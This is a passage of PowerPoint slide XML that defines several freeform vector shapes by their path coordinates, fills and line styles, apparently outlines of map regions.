                      <a:pt x="142" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="457"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36149" name="Freeform 282"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2912" y="730"/>
                <a:ext cx="159" cy="262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 159"/>
                  <a:gd name="T1" fmla="*/ 48 h 262"/>
                  <a:gd name="T2" fmla="*/ 52 w 159"/>
                  <a:gd name="T3" fmla="*/ 59 h 262"/>
                  <a:gd name="T4" fmla="*/ 54 w 159"/>
                  <a:gd name="T5" fmla="*/ 27 h 262"/>
                  <a:gd name="T6" fmla="*/ 62 w 159"/>
                  <a:gd name="T7" fmla="*/ 20 h 262"/>
                  <a:gd name="T8" fmla="*/ 77 w 159"/>
                  <a:gd name="T9" fmla="*/ 69 h 262"/>
                  <a:gd name="T10" fmla="*/ 87 w 159"/>
                  <a:gd name="T11" fmla="*/ 70 h 262"/>
                  <a:gd name="T12" fmla="*/ 82 w 159"/>
                  <a:gd name="T13" fmla="*/ 44 h 262"/>
                  <a:gd name="T14" fmla="*/ 80 w 159"/>
                  <a:gd name="T15" fmla="*/ 17 h 262"/>
                  <a:gd name="T16" fmla="*/ 93 w 159"/>
                  <a:gd name="T17" fmla="*/ 4 h 262"/>
                  <a:gd name="T18" fmla="*/ 106 w 159"/>
                  <a:gd name="T19" fmla="*/ 12 h 262"/>
                  <a:gd name="T20" fmla="*/ 109 w 159"/>
                  <a:gd name="T21" fmla="*/ 36 h 262"/>
                  <a:gd name="T22" fmla="*/ 109 w 159"/>
                  <a:gd name="T23" fmla="*/ 54 h 262"/>
                  <a:gd name="T24" fmla="*/ 118 w 159"/>
                  <a:gd name="T25" fmla="*/ 45 h 262"/>
                  <a:gd name="T26" fmla="*/ 126 w 159"/>
                  <a:gd name="T27" fmla="*/ 57 h 262"/>
                  <a:gd name="T28" fmla="*/ 136 w 159"/>
                  <a:gd name="T29" fmla="*/ 76 h 262"/>
                  <a:gd name="T30" fmla="*/ 155 w 159"/>
                  <a:gd name="T31" fmla="*/ 96 h 262"/>
                  <a:gd name="T32" fmla="*/ 149 w 159"/>
                  <a:gd name="T33" fmla="*/ 115 h 262"/>
                  <a:gd name="T34" fmla="*/ 130 w 159"/>
                  <a:gd name="T35" fmla="*/ 134 h 262"/>
                  <a:gd name="T36" fmla="*/ 119 w 159"/>
                  <a:gd name="T37" fmla="*/ 203 h 262"/>
                  <a:gd name="T38" fmla="*/ 104 w 159"/>
                  <a:gd name="T39" fmla="*/ 225 h 262"/>
                  <a:gd name="T40" fmla="*/ 101 w 159"/>
                  <a:gd name="T41" fmla="*/ 255 h 262"/>
                  <a:gd name="T42" fmla="*/ 91 w 159"/>
                  <a:gd name="T43" fmla="*/ 261 h 262"/>
                  <a:gd name="T44" fmla="*/ 67 w 159"/>
                  <a:gd name="T45" fmla="*/ 234 h 262"/>
                  <a:gd name="T46" fmla="*/ 62 w 159"/>
                  <a:gd name="T47" fmla="*/ 204 h 262"/>
                  <a:gd name="T48" fmla="*/ 85 w 159"/>
                  <a:gd name="T49" fmla="*/ 198 h 262"/>
                  <a:gd name="T50" fmla="*/ 88 w 159"/>
                  <a:gd name="T51" fmla="*/ 176 h 262"/>
                  <a:gd name="T52" fmla="*/ 63 w 159"/>
                  <a:gd name="T53" fmla="*/ 185 h 262"/>
                  <a:gd name="T54" fmla="*/ 48 w 159"/>
                  <a:gd name="T55" fmla="*/ 169 h 262"/>
                  <a:gd name="T56" fmla="*/ 64 w 159"/>
                  <a:gd name="T57" fmla="*/ 159 h 262"/>
                  <a:gd name="T58" fmla="*/ 91 w 159"/>
                  <a:gd name="T59" fmla="*/ 133 h 262"/>
                  <a:gd name="T60" fmla="*/ 66 w 159"/>
                  <a:gd name="T61" fmla="*/ 107 h 262"/>
                  <a:gd name="T62" fmla="*/ 55 w 159"/>
                  <a:gd name="T63" fmla="*/ 136 h 262"/>
                  <a:gd name="T64" fmla="*/ 43 w 159"/>
                  <a:gd name="T65" fmla="*/ 148 h 262"/>
                  <a:gd name="T66" fmla="*/ 32 w 159"/>
                  <a:gd name="T67" fmla="*/ 136 h 262"/>
                  <a:gd name="T68" fmla="*/ 19 w 159"/>
                  <a:gd name="T69" fmla="*/ 114 h 262"/>
                  <a:gd name="T70" fmla="*/ 26 w 159"/>
                  <a:gd name="T71" fmla="*/ 84 h 262"/>
                  <a:gd name="T72" fmla="*/ 10 w 159"/>
                  <a:gd name="T73" fmla="*/ 75 h 262"/>
                  <a:gd name="T74" fmla="*/ 0 w 159"/>
                  <a:gd name="T75" fmla="*/ 43 h 262"/>
                  <a:gd name="T76" fmla="*/ 10 w 159"/>
                  <a:gd name="T77" fmla="*/ 28 h 262"/>
                  <a:gd name="T78" fmla="*/ 25 w 159"/>
                  <a:gd name="T79" fmla="*/ 24 h 262"/>
                  <a:gd name="T80" fmla="*/ 37 w 159"/>
                  <a:gd name="T81" fmla="*/ 20 h 262"/>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59"/>
                  <a:gd name="T124" fmla="*/ 0 h 262"/>
                  <a:gd name="T125" fmla="*/ 159 w 159"/>
                  <a:gd name="T126" fmla="*/ 262 h 262"/>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59" h="262">
                    <a:moveTo>
                      <a:pt x="37" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="20"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36150" name="Freeform 283"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1876" y="2853"/>
                <a:ext cx="44" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 44"/>
                  <a:gd name="T1" fmla="*/ 24 h 59"/>
                  <a:gd name="T2" fmla="*/ 44 w 44"/>
                  <a:gd name="T3" fmla="*/ 27 h 59"/>
                  <a:gd name="T4" fmla="*/ 36 w 44"/>
                  <a:gd name="T5" fmla="*/ 39 h 59"/>
                  <a:gd name="T6" fmla="*/ 33 w 44"/>
                  <a:gd name="T7" fmla="*/ 44 h 59"/>
                  <a:gd name="T8" fmla="*/ 30 w 44"/>
                  <a:gd name="T9" fmla="*/ 51 h 59"/>
                  <a:gd name="T10" fmla="*/ 26 w 44"/>
                  <a:gd name="T11" fmla="*/ 56 h 59"/>
                  <a:gd name="T12" fmla="*/ 24 w 44"/>
                  <a:gd name="T13" fmla="*/ 57 h 59"/>
                  <a:gd name="T14" fmla="*/ 20 w 44"/>
                  <a:gd name="T15" fmla="*/ 57 h 59"/>
                  <a:gd name="T16" fmla="*/ 12 w 44"/>
                  <a:gd name="T17" fmla="*/ 54 h 59"/>
                  <a:gd name="T18" fmla="*/ 6 w 44"/>
                  <a:gd name="T19" fmla="*/ 59 h 59"/>
                  <a:gd name="T20" fmla="*/ 5 w 44"/>
                  <a:gd name="T21" fmla="*/ 58 h 59"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 55 h 59"/>
                  <a:gd name="T24" fmla="*/ 3 w 44"/>
                  <a:gd name="T25" fmla="*/ 48 h 59"/>
                  <a:gd name="T26" fmla="*/ 6 w 44"/>
                  <a:gd name="T27" fmla="*/ 37 h 59"/>
                  <a:gd name="T28" fmla="*/ 6 w 44"/>
                  <a:gd name="T29" fmla="*/ 34 h 59"/>
                  <a:gd name="T30" fmla="*/ 3 w 44"/>
                  <a:gd name="T31" fmla="*/ 28 h 59"/>
                  <a:gd name="T32" fmla="*/ 2 w 44"/>
                  <a:gd name="T33" fmla="*/ 23 h 59"/>
                  <a:gd name="T34" fmla="*/ 1 w 44"/>
                  <a:gd name="T35" fmla="*/ 19 h 59"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 16 h 59"/>
                  <a:gd name="T38" fmla="*/ 1 w 44"/>
                  <a:gd name="T39" fmla="*/ 12 h 59"/>
                  <a:gd name="T40" fmla="*/ 4 w 44"/>
                  <a:gd name="T41" fmla="*/ 7 h 59"/>
                  <a:gd name="T42" fmla="*/ 9 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 59"/>
                  <a:gd name="T44" fmla="*/ 10 w 44"/>
                  <a:gd name="T45" fmla="*/ 1 h 59"/>
                  <a:gd name="T46" fmla="*/ 18 w 44"/>
                  <a:gd name="T47" fmla="*/ 3 h 59"/>
                  <a:gd name="T48" fmla="*/ 22 w 44"/>
                  <a:gd name="T49" fmla="*/ 5 h 59"/>
                  <a:gd name="T50" fmla="*/ 27 w 44"/>
                  <a:gd name="T51" fmla="*/ 8 h 59"/>
                  <a:gd name="T52" fmla="*/ 37 w 44"/>
                  <a:gd name="T53" fmla="*/ 16 h 59"/>
                  <a:gd name="T54" fmla="*/ 40 w 44"/>
                  <a:gd name="T55" fmla="*/ 20 h 59"/>
                  <a:gd name="T56" fmla="*/ 43 w 44"/>
                  <a:gd name="T57" fmla="*/ 24 h 59"/>
                  <a:gd name="T58" fmla="*/ 44 w 44"/>
                  <a:gd name="T59" fmla="*/ 24 h 59"/>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44"/>
                  <a:gd name="T91" fmla="*/ 0 h 59"/>
                  <a:gd name="T92" fmla="*/ 44 w 44"/>
                  <a:gd name="T93" fmla="*/ 59 h 59"/>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44" h="59">
                    <a:moveTo>
                      <a:pt x="44" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="44" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="24"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36151" name="Freeform 284"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1876" y="2853"/>
                <a:ext cx="44" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 44"/>
                  <a:gd name="T1" fmla="*/ 24 h 59"/>
                  <a:gd name="T2" fmla="*/ 44 w 44"/>
                  <a:gd name="T3" fmla="*/ 27 h 59"/>
                  <a:gd name="T4" fmla="*/ 36 w 44"/>
                  <a:gd name="T5" fmla="*/ 39 h 59"/>
                  <a:gd name="T6" fmla="*/ 33 w 44"/>
                  <a:gd name="T7" fmla="*/ 44 h 59"/>
                  <a:gd name="T8" fmla="*/ 30 w 44"/>
                  <a:gd name="T9" fmla="*/ 51 h 59"/>
                  <a:gd name="T10" fmla="*/ 26 w 44"/>
                  <a:gd name="T11" fmla="*/ 56 h 59"/>
                  <a:gd name="T12" fmla="*/ 24 w 44"/>
                  <a:gd name="T13" fmla="*/ 57 h 59"/>
                  <a:gd name="T14" fmla="*/ 20 w 44"/>
                  <a:gd name="T15" fmla="*/ 57 h 59"/>
                  <a:gd name="T16" fmla="*/ 12 w 44"/>
                  <a:gd name="T17" fmla="*/ 54 h 59"/>
                  <a:gd name="T18" fmla="*/ 6 w 44"/>
                  <a:gd name="T19" fmla="*/ 59 h 59"/>
                  <a:gd name="T20" fmla="*/ 5 w 44"/>
                  <a:gd name="T21" fmla="*/ 58 h 59"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 55 h 59"/>
                  <a:gd name="T24" fmla="*/ 3 w 44"/>
                  <a:gd name="T25" fmla="*/ 48 h 59"/>
                  <a:gd name="T26" fmla="*/ 6 w 44"/>
                  <a:gd name="T27" fmla="*/ 37 h 59"/>
                  <a:gd name="T28" fmla="*/ 6 w 44"/>
                  <a:gd name="T29" fmla="*/ 34 h 59"/>
                  <a:gd name="T30" fmla="*/ 3 w 44"/>
                  <a:gd name="T31" fmla="*/ 28 h 59"/>
                  <a:gd name="T32" fmla="*/ 2 w 44"/>
                  <a:gd name="T33" fmla="*/ 23 h 59"/>
                  <a:gd name="T34" fmla="*/ 1 w 44"/>
                  <a:gd name="T35" fmla="*/ 19 h 59"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 16 h 59"/>
                  <a:gd name="T38" fmla="*/ 1 w 44"/>
                  <a:gd name="T39" fmla="*/ 12 h 59"/>
                  <a:gd name="T40" fmla="*/ 4 w 44"/>
                  <a:gd name="T41" fmla="*/ 7 h 59"/>
                  <a:gd name="T42" fmla="*/ 9 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 59"/>
                  <a:gd name="T44" fmla="*/ 10 w 44"/>
                  <a:gd name="T45" fmla="*/ 1 h 59"/>
                  <a:gd name="T46" fmla="*/ 18 w 44"/>
                  <a:gd name="T47" fmla="*/ 3 h 59"/>
                  <a:gd name="T48" fmla="*/ 22 w 44"/>
                  <a:gd name="T49" fmla="*/ 5 h 59"/>
                  <a:gd name="T50" fmla="*/ 27 w 44"/>
                  <a:gd name="T51" fmla="*/ 8 h 59"/>
                  <a:gd name="T52" fmla="*/ 37 w 44"/>
                  <a:gd name="T53" fmla="*/ 16 h 59"/>
                  <a:gd name="T54" fmla="*/ 40 w 44"/>
                  <a:gd name="T55" fmla="*/ 20 h 59"/>
                  <a:gd name="T56" fmla="*/ 43 w 44"/>
                  <a:gd name="T57" fmla="*/ 24 h 59"/>
                  <a:gd name="T58" fmla="*/ 44 w 44"/>
                  <a:gd name="T59" fmla="*/ 24 h 59"/>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44"/>
                  <a:gd name="T91" fmla="*/ 0 h 59"/>
                  <a:gd name="T92" fmla="*/ 44 w 44"/>
                  <a:gd name="T93" fmla="*/ 59 h 59"/>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44" h="59">
                    <a:moveTo>
                      <a:pt x="44" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="44" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="24"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36152" name="Freeform 285"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2610" y="1793"/>
                <a:ext cx="156" cy="234"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
